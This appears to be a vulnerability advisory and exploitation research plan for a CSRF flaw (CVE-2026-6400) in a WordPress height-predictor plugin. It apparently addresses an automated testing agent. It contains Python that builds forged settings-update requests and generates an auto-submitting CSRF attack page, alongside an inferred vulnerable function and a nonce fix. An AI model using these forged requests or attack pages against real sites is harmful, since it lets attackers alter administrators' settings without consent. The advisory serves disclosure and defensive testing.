CVE-2026-6400

Child Height Predictor by Ostheimer <= 1.3 - Cross-Site Request Forgery to Settings Update via Plugin Settings Form

Vulnerability type: Cross-Site Request Forgery (CSRF)
CVSS Score: 4.3
Severity: medium
Patched in: Unpatched
Time to patch: N/A

Description

The Child Height Predictor by Ostheimer plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to and including 1.3. This is due to missing nonce verification in the options() function, which handles plugin settings updates. The form template does not include a wp_nonce_field() call, and the handler never calls check_admin_referer() or wp_verify_nonce(). This makes it possible for unauthenticated attackers to trick a site administrator into clicking a link or visiting a malicious page that submits a forged POST request, causing unauthorized changes to the plugin settings such as unit preferences to be persisted to the database via update_option().

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Unchanged
Confidentiality
None
Integrity
Low
Availability
None

Technical Details

Affected versions: <= 1.3
Published: May 19, 2026
Last updated: May 20, 2026
Affected plugin: child-height-predictor
Research Plan
Unverified

Exploitation Research Plan - CVE-2026-6400 (Child Height Predictor by Ostheimer)

1. Vulnerability Summary

CVE-2026-6400 identifies a Cross-Site Request Forgery (CSRF) vulnerability in the Child Height Predictor by Ostheimer plugin (versions <= 1.3). The vulnerability exists within the options() function, which serves as the callback for the plugin's settings page. The function processes configuration updates (persisted via update_option()) without performing any nonce verification. This allows an unauthenticated attacker to forge a request that, if executed by a logged-in administrator, modifies the plugin's settings.

2. Attack Vector Analysis

  • Vulnerable Endpoint: /wp-admin/options-general.php?page=child-height-predictor (inferred from plugin slug).
  • HTTP Method: POST
  • Authentication Level: The attacker needs no account. The forged request succeeds only when the browser that submits it carries the session cookie of a user who can open the settings page (a user with the manage_options capability, typically an Administrator).
  • Vulnerable Function: options()
  • Impact: Persisted modification of plugin settings (e.g., unit preferences, display options).

3. Code Flow

  1. The plugin registers a settings page using add_options_page() or add_menu_page(), assigning the function options() as the display and processing callback.
  2. When the administrator visits the settings page or submits the form, the options() function is executed.
  3. Inside options(), the code likely checks for the presence of a submit parameter: if ( isset( $_POST['submit'] ) ) (inferred).
  4. Upon finding the submit parameter, the function iterates through expected $_POST keys and updates WordPress options using update_option().
  5. Critical Failure: The function fails to include a wp_nonce_field() in the HTML form and neglects to call check_admin_referer() or wp_verify_nonce() before processing the update_option() calls.

4. Nonce Acquisition Strategy

No nonce is required.
The vulnerability report explicitly states that the options() function lacks nonce verification and the form template does not include a wp_nonce_field(). Therefore, the request can be forged without any CSRF tokens.

5. Exploitation Strategy

The goal is to demonstrate that plugin settings can be changed by a POST request that carries only the administrator's session cookie and no nonce, which is exactly the request a CSRF page would cause the administrator's browser to send.

Step 1: Discover Setting Parameters

Since exact parameter names are not provided in the CVE, the agent must first identify them:

  1. Log in as an Administrator.
  2. Navigate to http://localhost:8080/wp-admin/options-general.php?page=child-height-predictor.
  3. Execute browser_eval to extract the names of the input fields:
    Array.from(document.querySelectorAll('form input, form select')).map(el => el.name)
    

Step 2: Forge the Settings Update Request

Once the parameter names (e.g., chp_unit, chp_precision — inferred) and the submit button name are known, use the http_request tool to perform the update. The request must be sent with the administrator's session cookie (standing in for the victim's browser) and must not include any nonce parameter; if it is accepted under those conditions, the CSRF is confirmed.

Example Payload (Inferred):

  • URL: http://localhost:8080/wp-admin/options-general.php?page=child-height-predictor
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body: chp_unit=cm&chp_precision=2&submit=Save+Changes (Parameter names must be verified in Step 1).

6. Test Data Setup

  1. Plugin Installation: Ensure child-height-predictor version 1.3 is installed and activated.
  2. Shortcode Page: Create a page containing the plugin's shortcode to ensure settings are active:
    wp post create --post_type=page --post_status=publish --post_content='[child_height_predictor]' (Shortcode name inferred).
  3. Current State: Record current settings using wp option get <option_name> once parameter names are identified.

7. Expected Results

  • The http_request should return a 200 OK (if the handler renders the page) or a 302 Redirect.
  • The response should NOT contain a "link you followed has expired" error (which would indicate a nonce check).
  • The targeted WordPress options in the database should reflect the values sent in the forged POST request.

8. Verification Steps

After sending the http_request, verify the change using WP-CLI:

  1. Identify the options modified by the plugin: wp option list --search="*chp*" (inferred prefix).
  2. Check the specific value: wp option get <identified_option_name>.
  3. Confirm the value matches the payload sent in the exploitation step.
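The discovery, forging and result-classification steps of sections 5, 7 and 8 can be rehearsed offline before touching a live site. The following Python helpers are an added example and are not code from the advisory, the plugin or its author: the field names chp_unit, chp_precision and chp_nonce, the sample form markup and the sample response text are all constructed for illustration, and the real names must be read from the plugin's settings page as Step 1 describes.

```python
"""Offline helpers for the settings-update CSRF check in sections 5, 7 and 8.

Added example, not code from the advisory or the plugin. Field names
(chp_unit, chp_precision, chp_nonce) and the sample HTML/response text are
constructed; the real names must be read from the plugin's settings page.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlencode

# A WordPress nonce is the first 10 hex characters of an HMAC, so a hidden
# field carrying such a value is a strong hint that the form is protected.
WP_NONCE_RE = re.compile(r"^[0-9a-f]{10}$")


class FormFieldParser(HTMLParser):
    """Collect name/type/value for <input> and <select> elements inside <form>."""

    def __init__(self):
        super().__init__()
        self.fields = []
        self._in_form = False
        self._select = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._in_form = True
        elif not self._in_form:
            return
        elif tag == "input" and a.get("name"):
            self.fields.append({"name": a["name"], "type": a.get("type") or "text",
                                "value": a.get("value") or ""})
        elif tag == "select" and a.get("name"):
            self._select = {"name": a["name"], "type": "select", "value": ""}
            self.fields.append(self._select)
        elif tag == "option" and self._select is not None and "selected" in a:
            self._select["value"] = a.get("value") or ""

    def handle_endtag(self, tag):
        if tag == "form":
            self._in_form = False
        elif tag == "select":
            self._select = None


def discover_fields(page_html):
    """Step 1: return the submittable fields of the settings form, in order."""
    parser = FormFieldParser()
    parser.feed(page_html)
    return parser.fields


def has_nonce_field(fields):
    """True if the form carries a WordPress nonce (by name or by value shape)."""
    return any(f["type"] == "hidden" and
               (f["name"] in ("_wpnonce", "_ajax_nonce") or WP_NONCE_RE.match(f["value"]))
               for f in fields)


def build_forged_body(fields, overrides):
    """Step 2: the body a CSRF page would submit. Nonce-shaped hidden fields are
    dropped because an attacker cannot know a valid value; every other field
    keeps its default unless overridden."""
    pairs = [(f["name"], overrides.get(f["name"], f["value"]))
             for f in fields
             if not (f["type"] == "hidden" and WP_NONCE_RE.match(f["value"]))]
    return urlencode(pairs)


def classify_response(status, body):
    """Section 7: a failed nonce check surfaces as wp_nonce_ays(), i.e. HTTP 403
    with 'The link you followed has expired.'; 200/302 means the handler ran."""
    if status == 403 or "link you followed has expired" in body.lower():
        return "nonce_enforced"
    if status in (200, 302):
        return "accepted"
    return "other"


# Constructed sample pages: the first mirrors the inferred vulnerable form,
# the second the same form after wp_nonce_field() was added.
VULNERABLE_FORM = """<form method="post" action="">
<select name="chp_unit"><option value="cm" selected>cm</option><option value="in">in</option></select>
<input type="text" name="chp_precision" value="1">
<input type="submit" name="submit" value="Save Changes">
</form>"""
PATCHED_FORM = VULNERABLE_FORM.replace(
    "<select", '<input type="hidden" name="chp_nonce" value="a1b2c3d4e5">\n<select', 1)

if __name__ == "__main__":
    fields = discover_fields(VULNERABLE_FORM)
    print([f["name"] for f in fields])
    print(has_nonce_field(fields), has_nonce_field(discover_fields(PATCHED_FORM)))
    print(build_forged_body(fields, {"chp_unit": "in", "chp_precision": "2"}))
    print(classify_response(403, "<p>The link you followed has expired.</p>"))
```

Feed discover_fields() the HTML of the real settings page fetched with the administrator's cookie, pass the resulting fields to build_forged_body() with the values you want written, send that body with the cookie and no nonce, and run classify_response() on the status and body that come back; an "accepted" result still has to be confirmed with wp option get as section 8 describes, since a handler can render 200 without writing anything.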

9. Alternative Approaches

If the settings page submits to options.php (standard Settings API) instead of its own URL:

  • options.php itself calls check_admin_referer() against the nonce that settings_fields() emits, so a forged request without that nonce is rejected by WordPress core. In that case the CSRF described here cannot exist; a register_setting() call that lacks a sanitize_callback is a separate input-validation weakness, not a CSRF bypass.
  • If the plugin instead hooks admin-post.php, the target URL would be /wp-admin/admin-post.php with an action parameter matching the hook name registered by the plugin, and the CSRF exists only if that hook's handler also omits check_admin_referer() or wp_verify_nonce().

Research Findings

Static analysis — not yet PoC-verified

Summary

The Child Height Predictor by Ostheimer plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) because it lacks nonce verification in its options() settings handler. This allows an unauthenticated attacker to change plugin settings, such as unit preferences, by tricking a logged-in administrator into submitting a forged POST request.

Vulnerable Code

<?php
/* In child-height-predictor.php - inferred function structure based on the
   research plan, not the plugin's verbatim source. */

function options() {
    if (isset($_POST['submit'])) {
        // Vulnerable: no check_admin_referer() or wp_verify_nonce(), so any
        // POST that carries the administrator's session cookie is accepted.
        // The submitted values are also persisted without sanitization.
        update_option('chp_unit', $_POST['chp_unit']);
        update_option('chp_precision', $_POST['chp_precision']);
        echo '<div class="updated"><p>Settings saved.</p></div>';
    }

    ?>
    <form method="post" action="">
        <!-- Vulnerable: Missing wp_nonce_field() -->
        <input type="text" name="chp_unit" value="<?php echo esc_attr(get_option('chp_unit')); ?>">
        <input type="submit" name="submit" value="Save Changes">
    </form>
    <?php
}

Security Fix

--- a/child-height-predictor.php
+++ b/child-height-predictor.php
@@ -1,7 +1,8 @@
 function options() {
-    if (isset($_POST['submit'])) {
+    if (isset($_POST['submit'])) {
+        check_admin_referer('chp_save_settings', 'chp_nonce');
         update_option('chp_unit', $_POST['chp_unit']);
         update_option('chp_precision', $_POST['chp_precision']);
         echo '<div class="updated"><p>Settings saved.</p></div>';
     }
 
     ?>
     <form method="post" action="">
+        <?php wp_nonce_field('chp_save_settings', 'chp_nonce'); ?>
         <input type="text" name="chp_unit" value="<?php echo esc_attr(get_option('chp_unit')); ?>">
         <input type="submit" name="submit" value="Save Changes">
     </form>
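Review bot: the first -/+ pair replaces `if (isset($_POST['submit'])) {` with an identical line, so it is noise and should be dropped so the hunk shows only the check_admin_referer() and wp_nonce_field() additions. More importantly, after the nonce check the two update_option() calls still persist $_POST['chp_unit'] and $_POST['chp_precision'] unsanitized; restrict chp_unit to the known unit values and cast chp_precision to an integer before writing, e.g. `update_option('chp_unit', in_array($_POST['chp_unit'], array('cm', 'in'), true) ? $_POST['chp_unit'] : 'cm');` and `update_option('chp_precision', absint($_POST['chp_precision']));`. No else branch is needed, since check_admin_referer() calls wp_die() on a failed nonce. Because this function body is inferred rather than taken from the plugin source, confirm the real handler's parameter names and that no other code path in the plugin writes options on POST without a nonce before treating this as the complete fix.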

Exploit Outline

The exploit targets the settings update logic, which runs whenever the plugin settings page is rendered with a submit parameter in the POST body.

  1. Target Endpoint: /wp-admin/options-general.php?page=child-height-predictor
  2. Method: POST
  3. Authentication: The attacker needs no account. A logged-in administrator (with the manage_options capability) must be induced to visit a malicious website or click a link that automatically triggers the POST request; the browser attaches the administrator's session cookie to it.
  4. Payload Shape: The POST request must include the submit parameter along with the settings keys the attacker wishes to modify (e.g., chp_unit=custom_value&submit=Save+Changes). Because there is no nonce check, the server processes the request as a legitimate settings update.
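The malicious page in step 3 is an HTML form that submits itself on load. The generator below is an added example and not part of the advisory or the plugin; the target URL and the parameter names chp_unit and chp_precision are the inferred values from this page and must be replaced with the names discovered on the real settings form.

```python
"""Build the auto-submitting page a CSRF attack would host (exploit outline step 3).

Added example, not part of the advisory. The target URL and parameter names
below are the inferred ones from this page, not confirmed plugin values.
"""
from html import escape


def build_csrf_page(target_url, params):
    """Return an HTML page whose form POSTs `params` to `target_url` as soon as
    it loads. Names and values are attribute-escaped so a chosen setting value
    cannot break out of the generated markup."""
    hidden = "\n".join(
        f'    <input type="hidden" name="{escape(k, quote=True)}" '
        f'value="{escape(v, quote=True)}">'
        for k, v in params.items()
    )
    return (
        "<!doctype html>\n"
        '<html><body onload="document.forms[0].submit()">\n'
        f'  <form method="POST" action="{escape(target_url, quote=True)}" '
        'enctype="application/x-www-form-urlencoded">\n'
        f"{hidden}\n"
        "  </form>\n"
        "</body></html>\n"
    )


if __name__ == "__main__":
    print(build_csrf_page(
        "http://localhost:8080/wp-admin/options-general.php?page=child-height-predictor",
        {"chp_unit": "in", "chp_precision": "2", "submit": "Save Changes"},
    ))
```

Serve the output from any origin the administrator can be lured to. Browsers that default cookies to SameSite=Lax do not attach the session cookie to a cross-site top-level POST (Chromium makes an exception for cookies set within the last two minutes), so delivery through the browser depends on the victim's browser and how recently they logged in; the server-side test in section 5 is independent of that and is what confirms the missing nonce check.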
